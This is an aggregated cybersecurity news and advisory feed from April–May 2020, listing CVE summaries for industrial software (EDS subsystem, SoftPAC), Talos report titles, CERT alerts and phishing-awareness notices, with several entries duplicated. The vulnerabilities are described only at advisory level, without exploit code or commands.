IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119 A memory corruption vulnerability exists in the algorithm that matches square brackets in the EDS subsystem. This may allow an attacker to craft specialized EDS files to crash the EDSParser COM object, leading to denial-of-service conditions. Read more: "EDS Subsystem Vulnerabilities Expose OT Assets to Malicious File Delivery"

https://claroty.com/team82/disclosure-dashboard/cve-2020-12038
CVE-2020-12034
2020-05-19T00:00:00Z | 1589846400

IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') CWE-89 The EDS subsystem does not provide adequate input sanitization, which may allow an attacker to craft specialized EDS files to inject SQL queries and manipulate the database storing the EDS files. This may lead to denial-of-service (DoS) conditions or allow an attacker to manipulate the SQL engine to write or modify files on the system. Read more: "EDS Subsystem Vulnerabilities Expose OT Assets to Malicious File Delivery"

https://claroty.com/team82/disclosure-dashboard/cve-2020-12034-cve-2020-12038
RIA korraldab ingliskeelse veebiseminari „Cyber Security in Estonia 2020: What Has Changed“
2020-05-18T21:00:00Z | 1589835600

Riigi infosüsteemi amet (RIA) korraldab 26. mail kella 17–19 ingliskeelse veebiseminari „Cyber Security in Estonia 2020: What Has Changed“, kus esinejad annavad Eesti e-eduloost huvitunutele ülevaate Eesti küberturvalisust tagavate asutuste rollist, olukorrast ja tulevikust.

https://ria.ee/uudised/ria-korraldab-ingliskeelse-veebiseminari-cyber-security-estonia-2020-what-has-changed
Ethics, Responsibilities, Vulnerabilities
2020-05-18T15:00:00Z | 1589814000

Coordinated Vulnerability Disclosure is hard: Here is what to do about it.

https://www.first.org/blog/20200518_Ethics_Responsibilities_Vulnerabilities
Ethics, Responsibilities, Vulnerabilities
2020-05-18T15:00:00Z | 1589814000

Coordinated Vulnerability Disclosure is hard: Here is what to do about it.

https://www.first.org/blog/20200518_Ethics_Responsibilities_Vulnerabilities
Why is Cloud-native SD-WAN Considered a Top Choice Among IP-VPN Alternatives?
2020-05-18T12:53:02Z | 1589806382

The post Why is Cloud-native SD-WAN Considered a Top Choice Among IP-VPN Alternatives? appeared first on Cato Networks.

https://www.catonetworks.com/resources/why-is-cloud-native-sd-wan-considered-a-top-choice-among-ip-vpn-alternatives/
Nitro Pro PDF Javascript XML error handling Information Disclosure Vulnerability
2020-05-18T00:00:00Z | 1589760000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1014
Nitro PRO PDF nested pages remote code execution vulnerability
2020-05-18T00:00:00Z | 1589760000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0997
Nitro Pro PDF Pattern Object Code Execution Vulnerability
2020-05-18T00:00:00Z | 1589760000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1013
Synology SRM SafeAccess 1.2.1-0220 code execution Vvulnerability
2020-05-18T00:00:00Z | 1589760000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1087
Bug Hunting with Crytic
2020-05-15T11:50:31Z | 1589543431

Crytic, our Github app for discovering smart contract flaws, is kind of a big deal: It detects security issues without human intervention, providing continuous assurance while you work and securing your codebase before deployment. Crytic finds many bugs no other tools can detect, including some that are not widely known. Right now, Crytic has 90+ […]

https://blog.trailofbits.com/2020/05/15/bug-hunting-with-crytic/
CVE-2020-12042
2020-05-15T00:00:00Z | 1589500800

EXTERNAL CONTROL OF FILE NAME OR PATH CWE-73 Paths specified within the zip files used to update the SoftPAC firmware are not sanitized. As a result, an attacker with user privileges can gain arbitrary file write access with system access. Read more: "Security Flaws in Software-Based PLCs Enable Remote Code Execution on Windows Box"

https://claroty.com/team82/disclosure-dashboard/cve-2020-12042-cve-2020-12046-cve-2020-10612-cve-2020-10616-cve-2020-10620
CVE-2020-12046
2020-05-14T00:00:00Z | 1589414400

IMPROPER VERIFICATION OF CRYPTOGRAPHIC SIGNATURE CWE-347 SoftPAC's firmware files' signatures are not verified upon firmware update. This allows an attacker to replace legitimate firmware files with malicious files. Read more: "Security Flaws in Software-Based PLCs Enable Remote Code Execution on Windows Box"

https://claroty.com/team82/disclosure-dashboard/cve-2020-12046
CVE-2020-10620
2020-05-14T00:00:00Z | 1589414400

IMPROPER AUTHORIZATION CWE-285 SoftPAC communication does not include any credentials. This allows an attacker with network access to directly communicate with SoftPAC, including, for example, stopping the service remotely. Read more: "Security Flaws in Software-Based PLCs Enable Remote Code Execution on Windows Box"

https://claroty.com/team82/disclosure-dashboard/cve-2020-10620
CVE-2020-10616
2020-05-14T00:00:00Z | 1589414400

UNCONTROLLED SEARCH PATH ELEMENT CWE-427 SoftPAC does not specify the path of multiple imported .dll files. Therefore, an attacker can replace them and execute code whenever the service starts. Read more: "Security Flaws in Software-Based PLCs Enable Remote Code Execution on Windows Box"

https://claroty.com/team82/disclosure-dashboard/cve-2020-10616
CVE-2020-10612
2020-05-14T00:00:00Z | 1589414400

IMPROPER ACCESS CONTROL CWE-284 SoftPACAgent communicates with SoftPACMonitor over network Port 22000. However, this port is open without any restrictions. This allows an attacker with network access to control the SoftPACAgent service including updating SoftPAC firmware, starting or stopping service, or writing to certain registry values. Read more: "Security Flaws in Software-Based PLCs Enable Remote Code Execution on Windows Box"

https://claroty.com/team82/disclosure-dashboard/cve-2020-10612
CVE-2019-6820
2020-05-14T00:00:00Z | 1589414400

CWE-306: Missing Authentication for Critical Function vulnerability exists which could cause a modification of device IP configuration (IP address, network mask and gateway IP address)

https://claroty.com/team82/disclosure-dashboard/cve-2019-6820
Security Alert (A20-05-02): Multiple Vulnerabilities in Microsoft Products (May 2020)
2020-05-13T04:00:00Z | 1589342400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-05-03): Multiple Vulnerabilities in Adobe Reader/Acrobat
2020-05-13T04:00:00Z | 1589342400

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Working From Home. So Far, So Much Learned.
2020-05-13T04:00:00Z | 1589342400

Hello all! I'm Nicole Fitzpatrick, Deputy General Counsel at Akamai. I also sit on the D&I Executive Steering Committee. Normally I'd be in our Cambridge office about now, but like so many of us I am working from home and writing this surrounded by four kids, the dog and my husband (not written in particular order of importance, by the way).

https://www.akamai.com/blog/culture/working-from-home-so-far-so-much-learned1
FIRST aims to update the Traffic Light Protocol standard to increase global adoption
2020-05-13T00:00:00Z | 1589328000

https://www.first.org/newsroom/releases/20200513
FIRST aims to update the Traffic Light Protocol standard to increase global adoption
2020-05-13T00:00:00Z | 1589328000

https://www.first.org/newsroom/releases/20200513
Remote Access Survey: Is the Industry Ready for a Global Crisis?
2020-05-12T18:25:58Z | 1589307958

Remote access isn’t a new demand, yet COVID-19 caught the industry by surprise, with businesses unprepared to effectively shift to a work-from-everywhere model. Why? Because enterprises were suddenly forced to enable remote access to all users, at once, and from anywhere across the globe. Current solutions, such as Virtual Private Network (VPN) servers, provide connectivity... The post Remote Access Survey: Is the Industry Ready for a Global Crisis? appeared first on Cato Networks.

https://www.catonetworks.com/blog/remote-access-survey-is-the-industry-ready-for-a-global-crisis/
Microsoft Office Excel s_Schema Code Execution Vulnerability
2020-05-12T00:00:00Z | 1589241600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1015
Adobe Acrobat Reader DC Javascript submitForm Remote Code Execution Vulnerability
2020-05-12T00:00:00Z | 1589241600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1031
Adobe Acrobat Reader DC Annotation Destroy Remote Code Execution
2020-05-12T00:00:00Z | 1589241600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1028
CVE-2020-7494
2020-05-12T00:00:00Z | 1589241600

PATH TRAVERSAL CWE-22 An attacker could exploit this path traversal vulnerability by getting a user to visit a malicious page or open a malicious file.

https://claroty.com/team82/disclosure-dashboard/cve-2020-7494-cve-2020-7495-cve-2020-7496
Digital security through cooperation
2020-05-11T13:14:24Z | 1589202864

The National Cyber Security Centre at the Finnish Transport and Communications Agency, the Digipooli network and the National Emergency Supply Agency are working together to produce up-to-date information on the state of our digital society under the current emergency conditions. Particular emphasis is placed on ensuring that healthcare services continue to function as required. The agencies and the network have urged the ICT industry to prioritise the social and healthcare services sector.

https://www.kyberturvallisuuskeskus.fi/en/news/digital-security-through-cooperation
Digital security through cooperation
2020-05-11T13:14:24Z | 1589202864

The National Cyber Security Centre at the Finnish Transport and Communications Agency, the Digipooli network and the National Emergency Supply Agency are working together to produce up-to-date information on the state of our digital society under the current emergency conditions. Particular emphasis is placed on ensuring that healthcare services continue to function as required. The agencies and the network have urged the ICT industry to prioritise the social and healthcare services sector.

https://www.kyberturvallisuuskeskus.fi/en/news/digital-security-through-cooperation
May Day quiz results are in — spotting scams proves difficult
2020-05-11T13:08:49Z | 1589202529

The National Cyber Security Centre organised a May Day quiz on identifying phishing sites in late April and early May. We promised to publish the quiz results, and you can now read more about them in this Information Security Now! article. We received some 3,700 responses in total. The results reflected the difficulty of spotting a phishing site based only on its appearance.

https://www.kyberturvallisuuskeskus.fi/en/news/may-day-quiz-results-are-spotting-scams-proves-difficult
May Day quiz results are in — spotting scams proves difficult
2020-05-11T13:08:49Z | 1589202529

The National Cyber Security Centre organised a May Day quiz on identifying phishing sites in late April and early May. We promised to publish the quiz results, and you can now read more about them in this Information Security Now! article. We received some 3,700 responses in total. The results reflected the difficulty of spotting a phishing site based only on its appearance.

https://www.kyberturvallisuuskeskus.fi/en/news/may-day-quiz-results-are-spotting-scams-proves-difficult
Tips for identifying suspicious websites
2020-05-11T13:02:48Z | 1589202168

Phishing for login details and personal data concerns all users of the internet and online services. Phishing is carried out constantly in the name of virtually all online service providers, and it is therefore important to remain informed of possible threats and exercise care when entering your information (for example passwords or phone numbers) anywhere on the internet. Here are some tips that will help you identify suspicious websites.

https://www.kyberturvallisuuskeskus.fi/en/news/tips-identifying-suspicious-websites
Tips for identifying suspicious websites
2020-05-11T13:02:48Z | 1589202168

Phishing for login details and personal data concerns all users of the internet and online services. Phishing is carried out constantly in the name of virtually all online service providers, and it is therefore important to remain informed of possible threats and exercise care when entering your information (for example passwords or phone numbers) anywhere on the internet. Here are some tips that will help you identify suspicious websites.

https://www.kyberturvallisuuskeskus.fi/en/news/tips-identifying-suspicious-websites
Don't Force Yourself to Become a Bug Bounty Hunter
2020-05-11T00:00:00Z | 1589155200

Nearly every one of the successful bug bounty hunters I've met all seem to have one thing in common, and that is that they absolutely love what they do.

https://samcurry.net/dont-force-yourself-to-become-a-bug-bounty-hunter
Why SASE is the Future of SD-WAN & Security
2020-05-07T07:27:57Z | 1588836477

The post Why SASE is the Future of SD-WAN & Security appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-14
A scam-filled February saw dreary cyber weather conditions with fraudulent calls and billing scams
2020-05-06T11:48:06Z | 1588765686

February saw dreary cyber weather and stormy conditions on the scam front. Cyber weather reports described fraudulent callers posing as technical support as well as believable billing scams. An increase was also observed in the number of Office 365 security breaches. Platforms and software including Tomcat, Jboss and Exchange products required vulnerability patches. Overcast cyber skies continued to hang over domestic communications networks, which underwent six major disruptions in February.

https://www.kyberturvallisuuskeskus.fi/en/news/scam-filled-february-saw-dreary-cyber-weather-conditions-fraudulent-calls-and-billing-scams
A scam-filled February saw dreary cyber weather conditions with fraudulent calls and billing scams
2020-05-06T11:48:06Z | 1588765686

February saw dreary cyber weather and stormy conditions on the scam front. Cyber weather reports described fraudulent callers posing as technical support as well as believable billing scams. An increase was also observed in the number of Office 365 security breaches. Platforms and software including Tomcat, Jboss and Exchange products required vulnerability patches. Overcast cyber skies continued to hang over domestic communications networks, which underwent six major disruptions in February.

https://www.kyberturvallisuuskeskus.fi/en/news/scam-filled-february-saw-dreary-cyber-weather-conditions-fraudulent-calls-and-billing-scams
Let's Encrypt revoked certain website certificates on 4 and 5 March 2020
2020-05-06T11:37:33Z | 1588765053

An error was identified in the internal practices of website certificate service Let’s Encrypt, which resulted in a failure to correctly verify the validity of certain certificate requests. The error was corrected on 29 February 2020. Following the appropriate procedure, Let’s Encrypt revoked certain erroneously issued certificates, with further revocations also possible. The holders of the revoked certificates are responsible for ensuring that they are issued new certificates.

https://www.kyberturvallisuuskeskus.fi/en/news/lets-encrypt-revoked-certain-website-certificates-4-and-5-march-2020
Let's Encrypt revoked certain website certificates on 4 and 5 March 2020
2020-05-06T11:37:33Z | 1588765053

An error was identified in the internal practices of website certificate service Let’s Encrypt, which resulted in a failure to correctly verify the validity of certain certificate requests. The error was corrected on 29 February 2020. Following the appropriate procedure, Let’s Encrypt revoked certain erroneously issued certificates, with further revocations also possible. The holders of the revoked certificates are responsible for ensuring that they are issued new certificates.

https://www.kyberturvallisuuskeskus.fi/en/news/lets-encrypt-revoked-certain-website-certificates-4-and-5-march-2020
The NCSC-FI charts unprotected automation systems
2020-05-06T11:21:57Z | 1588764117

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom looks for unprotected automation equipment on data networks. The aim of this is to improve situational awareness and cyber security in Finland. The results obtained are compared to the results of previous years.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-charts-unprotected-automation-systems
The NCSC-FI charts unprotected automation systems
2020-05-06T11:21:57Z | 1588764117

The National Cyber Security Centre Finland (NCSC-FI) at the Finnish Transport and Communications Agency Traficom looks for unprotected automation equipment on data networks. The aim of this is to improve situational awareness and cyber security in Finland. The results obtained are compared to the results of previous years.

https://www.kyberturvallisuuskeskus.fi/en/news/ncsc-fi-charts-unprotected-automation-systems
Can you repel information security threats? All benefit from cyber exercises
2020-05-06T11:19:11Z | 1588763951

Let’s take an imaginary trip to a normal day at the office in Cyber town’s water supply and sewerage service where Pirjo, who is going through her e-mails, receives a very tempting offer. She is one of the thousands of professionals whose contribution is essential in ensuring the smooth functioning of our society by means of, among other things, secure working methods. It is useful for all to practise different situations and courses of action in advance. We can help you.

https://www.kyberturvallisuuskeskus.fi/en/news/can-you-repel-information-security-threats-all-benefit-cyber-exercises
Can you repel information security threats? All benefit from cyber exercises
2020-05-06T11:19:11Z | 1588763951

Let’s take an imaginary trip to a normal day at the office in Cyber town’s water supply and sewerage service where Pirjo, who is going through her e-mails, receives a very tempting offer. She is one of the thousands of professionals whose contribution is essential in ensuring the smooth functioning of our society by means of, among other things, secure working methods. It is useful for all to practise different situations and courses of action in advance. We can help you.

https://www.kyberturvallisuuskeskus.fi/en/news/can-you-repel-information-security-threats-all-benefit-cyber-exercises
Security Alert (A20-05-01): Multiple Vulnerabilities in Firefox
2020-05-06T04:00:00Z | 1588737600

Mozilla has published two security advisories (MFSA 2020-16 and MFSA 2020-17) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
3S-Smart Software Solutions GmbH CODESYS Runtime PLC_Task Code Execution Vulnerability
2020-05-06T00:00:00Z | 1588723200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1003
Synology SRM DHCP monitor hostname parsing Denial of Service Vulnerability
2020-05-06T00:00:00Z | 1588723200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1051
FIRST updates coordination principles for Multi-Party Vulnerability Coordination and Disclosure
2020-05-06T00:00:00Z | 1588723200

https://www.first.org/newsroom/releases/20200505
FIRST updates coordination principles for Multi-Party Vulnerability Coordination and Disclosure
2020-05-06T00:00:00Z | 1588723200

https://www.first.org/newsroom/releases/20200505
The WAN Accelerator and Modern Network Optimization
2020-05-05T05:58:37Z | 1588658317

Network latency costs money. This is a simple concept most IT professionals understand. However, when I discuss latency reduction and WAN acceleration with network managers and CIOs, one of the key takeaways is that getting network optimization right has changed significantly over the last decade. While WAN optimization and acceleration are still important, increased bandwidth... The post The WAN Accelerator and Modern Network Optimization appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-wan-accelerator-and-modern-network-optimization/
Accusoft ImageGear ICO icoread code execution vulnerability
2020-05-05T00:00:00Z | 1588636800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0999
Accusoft ImageGear ICO ico_read buffer size computation code execution vulnerability
2020-05-05T00:00:00Z | 1588636800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1004
Windows 10 Insider Preview Fast win32kbase HMMarkObjectDestroy Arbitrary Code Execution Vulnerability Regression
2020-05-05T00:00:00Z | 1588636800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1033
Accusoft ImageGear PNG store_data_buffer size computation code execution vulnerability
2020-05-05T00:00:00Z | 1588636800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0998
Accusoft ImageGear TIFF fill_in_raster buffer copy operation code execution vulnerability
2020-05-05T00:00:00Z | 1588636800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1017
Organisation! Prevent Office 365 credential phishing with the help of our guide
2020-05-04T08:47:43Z | 1588582063

Persistent Microsoft Office 365 credential phishing and stealing affects many domestic organisations. To combat the threat and to protect oneself against it we have compiled a comprehensive guide: Protection against Microsoft Office 365 credential phishing and data breaches. Our guide is aimed at those who are responsible for maintenance and information security at organisations, not forgetting corporate management and data protection officers.

https://www.kyberturvallisuuskeskus.fi/en/news/organisation-prevent-office-365-credential-phishing-help-our-guide
Organisation! Prevent Office 365 credential phishing with the help of our guide
2020-05-04T08:47:43Z | 1588582063

Persistent Microsoft Office 365 credential phishing and stealing affects many domestic organisations. To combat the threat and to protect oneself against it we have compiled a comprehensive guide: Protection against Microsoft Office 365 credential phishing and data breaches. Our guide is aimed at those who are responsible for maintenance and information security at organisations, not forgetting corporate management and data protection officers.

https://www.kyberturvallisuuskeskus.fi/en/news/organisation-prevent-office-365-credential-phishing-help-our-guide
Cato Develops Groundbreaking Method for Automatic Application Identification
2020-04-30T20:00:50Z | 1588276850

New applications are identified faster, more efficiently by using data science and Cato’s data warehouse Identifying applications has become a crucial part of network operations. Quickly and reliably identifying unknown applications is essential to everything from enforcing QoS rules, setting application policies, and preventing malicious communications. However, legacy approaches to application classification have become too... The post Cato Develops Groundbreaking Method for Automatic Application Identification appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-develops-groundbreaking-method-for-automatic-application-identification/
Parts of a Whole: Effect of COVID-19 on US Internet Traffic
2020-04-29T04:00:00Z | 1588132800

Introduction In our previous post, The Building Wave of Internet Traffic, we looked at the traffic patterns across Europe and the effect the COVID-19 pandemic has had. We examined traffic in Italy, Poland, and Spain, and demonstrated how we observed...

https://www.akamai.com/blog/security/parts-of-a-whole-effect-of-covid-19-on-us-internet-traffic
IntelMQ Manager release 2.1.1 fixes critical security issue
2020-04-28T13:34:25Z | 1588080865

The IntelMQ Manager version 2.1.1 released yesterday fixes a Remote Code Execution flaw (CWE-78: 'OS Command Injection'). The documentation for version 2.1.1 and installation instructions can be found on our GitHub repository. Always run IntelMQ Manager instances in private networks with proper authentication & TLS. Further, restrict access to the tool to web-browsers which can only access internal web-sites, as workaround for existing CSRF issues. See also our security considerations with more details. The issue was discovered by Bernhard Herzog (Intevation) during work sponsored by SUNET to fix the missing CSRF protection and migrate the application backend to Python. Update 2020-04-30: This vulnerability has been assigned CVE-2020-11016. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/4/intelmq-manager-release-211-fixes-critical-security-issue
Brazil Targeted by Phishing Scam Harnessing COVID-19 Fears
2020-04-28T07:00:00Z | 1588057200

Researchers at Akamai have identified a new phishing campaign targeting users in Brazil who are worried about their finances during the COVID-19 epidemic. Over two weeks, we identified that the three-question quiz campaign successfully targeted more than 850,000 victims, scamming them out of personal information, and in some cases, convincing them to install Adware on their computer.

https://www.akamai.com/blog/security/brazil-targeted-by-phishing-scam-harnessing-covid-19-fears
Security Alert (A20-04-05): Vulnerability in Squid
2020-04-28T04:00:00Z | 1588046400

Squid has published a security advisory (SQUID-2020:4) to address an integer overflow vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
High Theat Security Alert (A20-04-06): Vulnerability in Sophos XG Firewall
2020-04-28T04:00:00Z | 1588046400

Sophos has released a security hotfix to address a SQL injection vulnerability in Sophos XG Firewall firmware.

https://www.govcert.gov.hk/en/alerts_detail.php
Linux Kernel /proc/pid/syscall information disclosure vulnerability
2020-04-27T00:00:00Z | 1587945600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1211
Cato Networks Optimizes WAN and Cloud Connectivity
2020-04-26T15:07:00Z | 1587913620

The post Cato Networks Optimizes WAN and Cloud Connectivity appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-networks-optimized-wan-and-cloud-connectivity/
How to Migrate from MPLS to Cato Cloud
2020-04-26T15:00:00Z | 1587913200

The post How to Migrate from MPLS to Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-migrate-from-mpls-to-cato-cloud/
Värske aastaraamat tutvustab RIA tööd ja 2019. aasta sündmusi Eesti küberruumis
2020-04-24T08:26:03Z | 1587716763

Aastaraamat kirjeldab Riigi Infosüsteemi Ameti osakondade rolli e-riigis ning annab ülevaate 2019. aasta küberintsidentidest Eestis.

https://ria.ee/uudised/varske-aastaraamat-tutvustab-ria-tood-ja-2019-aasta-sundmusi-eesti-kuberruumis
Announcing the 1st International Workshop on Smart Contract Analysis
2020-04-23T11:50:29Z | 1587642629

At Trail of Bits we do more than just security audits: We also push the boundaries of research in vulnerability detection tools, regularly present our work in academic conferences, and review interesting papers from other researchers (see our recent Real World Crypto and Financial Crypto recaps). In this spirit, we and Northern Arizona University are […]

https://blog.trailofbits.com/2020/04/23/announcing-the-1st-international-workshop-on-smart-contract-analysis/
Ensuring VPN connection capacity
2020-04-23T11:04:16Z | 1587639856

The increased remote work traffic has strained organisations’ VPN capacity with the result that working has slowed down or even stopped. One possible solution to this problem is VPN split tunnelling.

https://www.kyberturvallisuuskeskus.fi/en/news/ensuring-vpn-connection-capacity
Ensuring VPN connection capacity
2020-04-23T11:04:16Z | 1587639856

The increased remote work traffic has strained organisations’ VPN capacity with the result that working has slowed down or even stopped. One possible solution to this problem is VPN split tunnelling.

https://www.kyberturvallisuuskeskus.fi/en/news/ensuring-vpn-connection-capacity
RIA hoiatab: Ole eriolukorras eriti IT-vaatlik
2020-04-23T10:00:50Z | 1587636050

Riigi Infosüsteemi Amet (RIA) alustas sel nädalal uue küberturvalisuse kampaaniaga “Ole eriolukorras eriti IT-vaatlik”, mis hoiatab inimesi kaugtööga seotud küberohtude eest. Kõik nõuanded turvaliselt kodukontoris ja distantsõppes toimetamiseks on koondatud veebilehele www.itvaatlik.ee.

https://ria.ee/uudised/ria-hoiatab-ole-eriolukorras-eriti-it-vaatlik
How to Address Gartner’s 2019 Strategic Roadmap for Networking
2020-04-22T14:06:05Z | 1587564365

The post How to Address Gartner’s 2019 Strategic Roadmap for Networking appeared first on Cato Networks.

https://www.catonetworks.com/resources/how-to-address-gartners-2019-strategic-roadmap-for-networking/
Analüüs: nutiseadmega e-hääletamine on teostatav
2020-04-22T11:00:57Z | 1587553257

Riigi valimisteenistuse ja Riigi Infosüsteemi Ameti tellitud analüüsi hinnangul on nutiseadmega e-hääletamine tehniliselt teostatav, kuid selleks tuleb maandada teatuid turvariske ning valida sobiv platvorm.

https://ria.ee/uudised/analuus-nutiseadmega-e-haaletamine-teostatav
Spells of Fair Cyber Weather in March Despite State of Emergency
2020-04-21T08:28:56Z | 1587457736

The state of emergency declared in March saw a marked increase in the number of people working from home. While communications networks’ data transfer volumes rose by dozens of per cent according to mobile operators, the capacity of Finland's networks was sufficient to withstand the additional strain. Despite some cracks in the clouds, the cyber weather for March was as rainy as expected.

https://www.kyberturvallisuuskeskus.fi/en/news/spells-fair-cyber-weather-march-despite-state-emergency
Spells of Fair Cyber Weather in March Despite State of Emergency
2020-04-21T08:28:56Z | 1587457736

The state of emergency declared in March saw a marked increase in the number of people working from home. While communications networks’ data transfer volumes rose by dozens of per cent according to mobile operators, the capacity of Finland's networks was sufficient to withstand the additional strain. Despite some cracks in the clouds, the cyber weather for March was as rainy as expected.

https://www.kyberturvallisuuskeskus.fi/en/news/spells-fair-cyber-weather-march-despite-state-emergency
Zoom Communications Registered Users Enumeration
2020-04-21T00:00:00Z | 1587427200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1052
Prusa Research PrusaSlicer _3MF_Importer::_handle_end_model() use-after-free vulnerability
2020-04-21T00:00:00Z | 1587427200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1218
CVE-2020-10641
2020-04-21T00:00:00Z | 1587427200

IMPROPER ACCESS CONTROLS CWE-284 An unprotected logging route may allow an attacker to write endless log statements into the database without space limits or authentication. This results in consuming the entire available hard-disk space, causing a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2020-10641
Synology DSM AppArmor synosearchagent misconfiguration vulnerability
2020-04-19T00:00:00Z | 1587254400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1158
Abusing HTTP Path Normalization and Cache Poisoning to steal Rocket League accounts
2020-04-19T00:00:00Z | 1587254400

Rocket League gives out in-game "white hats" for your character to wear if you submit, what is deemed by them, to be a "severe security vulnerability". Over the idle time provided by the ongoing pandemic, I decided why not try my luck at getting one of these items.

https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts
Revisiting 2000 cuts using Binary Ninja’s new decompiler
2020-04-17T19:53:10Z | 1587153190

It’s been four years since my blog post “2000 cuts with Binary Ninja.” Back then, Binary Ninja was in a private beta and the blog post response surprised its developers at Vector35. Over the past few years I’ve largely preferred to use IDA and HexRays for reversing, and then use Binary Ninja for any scripting. […]

https://blog.trailofbits.com/2020/04/17/revisiting-2000-cuts-using-binary-ninjas-new-decompiler/
Staying Healthy, Focused, and Above All Grateful During the COVID-19 Crisis
2020-04-17T04:00:00Z | 1587096000

By now, we are all subject in one way or another to the far-reaching impact of COVID-19. As we see on the news each day, the numbers of those infected by this deadly coronavirus continue to grow in terrifying increments. And even for those of us without family members or friends directly impacted by the virus, life has profoundly changed.

https://www.akamai.com/blog/culture/staying-healthy-focused-and-above-all-grateful-during-the-covid-crisis
Orientações para utilização das tecnologias para o ensino à distância
2020-04-17T00:00:00Z | 1587081600

Estas medidas destinam-se especificamente ao uso das plataformas que permitem a comunicação áudio e vídeo dirigidas à comunidade escolar, como é o caso das plataformas ZOOM, Moodle, Microsoft Teams e Google Classroom (esta última a disponibilizar brevemente).O objetivo destas orientações, que surgem no âmbito do ensino a distância, passa por garantir que a respetiva configuração e utilização destas plataformas seja feita de forma segura.Conheça as recomendações aqui .  Mantenha-se seguro!

https://dyn.cncs.gov.pt/pt/detalhe/art/592/orientacoes-para-utilizacao-das-tecnologias-para-o-ensino-a-distancia
Märtsis levisid koroonaviirust ära kasutavad skeemid
2020-04-15T21:00:00Z | 1586984400

Riigi Infosüsteemi Amet registreeris möödunud kuul 260 küberintsidenti. Silma paistsid Eestis ja maailmas koroonaviiruse infoküllust ära kasutavad skeemid ning Eesti ettevõtted sihikule võtnud arve- ja palgarahapettused.

https://ria.ee/uudised/martsis-levisid-koroonaviirust-ara-kasutavad-skeemid
What?s a 10? Pwning vCenter with CVE-2020-3952
2020-04-15T18:47:00Z | 1586976420

https://www.akamai.com/blog/security/pwning-vmware-vcenter-cve-2020-3952
Pick a video conference solution according to need and confidentiality of information
2020-04-15T11:37:24Z | 1586950644

When picking a video conference solution it is worthwhile to first think about the purpose of its use and about confidentiality of information. It is worthwhile for the organiser of the meeting to also ensure in advance that only the desired persons can take part in the meeting and that the persons joining the video conference only have the necessary access rights.

https://www.kyberturvallisuuskeskus.fi/en/news/pick-video-conference-solution-according-need-and-confidentiality-information
Pick a video conference solution according to need and confidentiality of information
2020-04-15T11:37:24Z | 1586950644

When picking a video conference solution it is worthwhile to first think about the purpose of its use and about confidentiality of information. It is worthwhile for the organiser of the meeting to also ensure in advance that only the desired persons can take part in the meeting and that the persons joining the video conference only have the necessary access rights.

https://www.kyberturvallisuuskeskus.fi/en/news/pick-video-conference-solution-according-need-and-confidentiality-information
The need for information increases under exceptional circumstances
2020-04-15T11:34:55Z | 1586950495

The NCSC-FI produces a variety of situational awareness products for organisations and citizens. Situational awareness products provide our customers with up-to-date information about events and phenomena affecting cyber security. Situational awareness is produced normally also in the exceptional situation. In addition, we produce publications on topical issues and provide sectoral data for our stakeholders.

https://www.kyberturvallisuuskeskus.fi/en/news/need-information-increases-under-exceptional-circumstances
The need for information increases under exceptional circumstances
2020-04-15T11:34:55Z | 1586950495

The NCSC-FI produces a variety of situational awareness products for organisations and citizens. Situational awareness products provide our customers with up-to-date information about events and phenomena affecting cyber security. Situational awareness is produced normally also in the exceptional situation. In addition, we produce publications on topical issues and provide sectoral data for our stakeholders.

https://www.kyberturvallisuuskeskus.fi/en/news/need-information-increases-under-exceptional-circumstances
Remember to update devices, software and applications!
2020-04-15T11:21:25Z | 1586949685

Exceptional times may momentarily turn our focus elsewhere. However, remember to take care of your cyber security by also taking care of updates under exceptional circumstances.

https://www.kyberturvallisuuskeskus.fi/en/news/remember-update-devices-software-and-applications
Remember to update devices, software and applications!
2020-04-15T11:21:25Z | 1586949685

Exceptional times may momentarily turn our focus elsewhere. However, remember to take care of your cyber security by also taking care of updates under exceptional circumstances.

https://www.kyberturvallisuuskeskus.fi/en/news/remember-update-devices-software-and-applications
The number of unsecured remote desktop services and network connection services increased significantly in March
2020-04-15T11:19:46Z | 1586949586

Devices’ remote access services open to the internet expose organisations to data breaches. Administrators should, at the latest now, make sure that teleworkers’ devices are secured and that firewall settings are appropriate.

https://www.kyberturvallisuuskeskus.fi/en/news/number-unsecured-remote-desktop-services-and-network-connection-services-increased
The number of unsecured remote desktop services and network connection services increased significantly in March
2020-04-15T11:19:46Z | 1586949586

